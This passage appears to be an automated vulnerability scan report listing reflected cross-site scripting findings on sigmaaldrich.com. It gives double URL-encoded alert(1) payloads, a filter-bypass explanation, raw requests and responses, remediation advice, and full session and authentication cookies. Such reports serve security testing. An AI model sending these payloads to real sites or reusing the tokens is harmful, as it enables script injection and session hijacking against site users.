Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/5adfd";alert(1)//6b84be9a72b","E404") ;
   </script>
...[SNIP]...

1.4. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9 was submitted in the REST URL parameter 1. This input was echoed as 111e8";alert(1)//badc87d23d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography111e8%2522%253balert%25281%2529%252f%252fbadc87d23d9/analytical-chromatography-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28968
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography111e8";alert(1)//badc87d23d9/analytical-chromatography-catalog.html","E404") ;
   </script>
...[SNIP]...

1.5. http://www.sigmaaldrich.com/analytical-chromatography/analytical-chromatography-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-chromatography-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74355%2522%253balert%25281%2529%252f%252f989934dd0d8 was submitted in the REST URL parameter 2. This input was echoed as 74355";alert(1)//989934dd0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/74355%2522%253balert%25281%2529%252f%252f989934dd0d8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:55 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/74355";alert(1)//989934dd0d8","E404") ;
   </script>
...[SNIP]...

1.6. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a9a%2522%253balert%25281%2529%252f%252fad9658751f was submitted in the REST URL parameter 1. This input was echoed as 25a9a";alert(1)//ad9658751f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography25a9a%2522%253balert%25281%2529%252f%252fad9658751f/analytical-reagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography25a9a";alert(1)//ad9658751f/analytical-reagents.html","E404") ;
   </script>
...[SNIP]...

1.7. http://www.sigmaaldrich.com/analytical-chromatography/analytical-reagents.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-reagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a213b%2522%253balert%25281%2529%252f%252fd062356e941 was submitted in the REST URL parameter 2. This input was echoed as a213b";alert(1)//d062356e941 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a213b%2522%253balert%25281%2529%252f%252fd062356e941 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a213b";alert(1)//d062356e941","E404") ;
   </script>
...[SNIP]...

1.8. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53 was submitted in the REST URL parameter 1. This input was echoed as 5b7f8";alert(1)//9bb4c219a53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography5b7f8%2522%253balert%25281%2529%252f%252f9bb4c219a53/analytical-standards.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 